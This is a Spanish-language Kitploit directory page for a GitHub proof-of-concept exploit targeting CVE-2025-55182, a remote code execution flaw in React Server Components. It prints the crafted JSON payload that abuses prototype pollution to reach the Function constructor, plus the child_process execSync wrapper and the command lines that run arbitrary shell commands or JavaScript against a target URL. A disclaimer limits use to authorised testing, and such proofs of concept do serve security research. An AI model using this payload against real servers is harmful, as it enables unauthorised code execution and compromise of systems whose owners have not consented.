Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
react-ssr-vulnerability — Este es un script POC para CVE-2025-55182 (React SSR RCE) | Kitploit
Herramientas/GitHubGitHub/darker-ink/react-ssr-vulnerability
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

Este es un script POC para CVE-2025-55182 (React SSR RCE)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

CVE-2025-55182 - React Server Components RCE POC

Este es un PoC con fines educativos y de investigación en seguridad únicamente. Esta vulnerabilidad ha sido parcheada en las últimas versiones de los paquetes afectados. Utiliza esta herramienta solo en sistemas que te pertenezcan o sobre los que tengas permiso explícito para probar. No soy responsable de ninguna acción legal emprendida contra ti.

Construcción del Payload

El exploit crea un objeto JSON especialmente manipulado que abusa de la cadena de prototipos de JavaScript:

root@kitploit:~
{
  "then": "$1:__proto__:then",           // Pollutes the prototype chain
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Injected malicious code
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Envoltura de comandos

El PoC admite dos modos:

Modo estándar (por defecto):

root@kitploit:~
process.mainModule.require("child_process").execSync("YOUR_COMMAND");

Envuelve comandos de shell para ejecutarlos mediante child_process de Node.js.

Modo sin procesar (bandera --raw):

root@kitploit:~
// Executes arbitrary JavaScript directly

Permite la ejecución directa de código JavaScript sin envolverlo en comandos de shell.

Uso

Ejecución Básica de Comandos

root@kitploit:~
bun run index.ts <command_file> <target_url>

Ejemplo:

root@kitploit:~
# Create a command file
echo "whoami" > cmd.txt

# Execute against vulnerable endpoint
bun run index.ts cmd.txt http://localhost:3000

Modo JavaScript sin procesar

root@kitploit:~
bun run index.ts --raw <js_file> <target_url>

Ejemplo:

root@kitploit:~
# Create JavaScript payload
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Execute raw JavaScript
bun run index.ts --raw payload.js http://localhost:3000

Argumentos

  • <file_path>: Ruta al archivo que contiene el comando o el código JavaScript
  • <target_url>: URL del endpoint de React Server Function
  • --raw: (Opcional) Ejecuta JavaScript sin procesar en lugar de comandos de shell

Atribución

Descubierto por: Lachlan Davidson
Divulgado por: The React Team & Meta Security

Referencias

  • Aviso de seguridad oficial de React
  • CVE-2025-55182
Descargar herramienta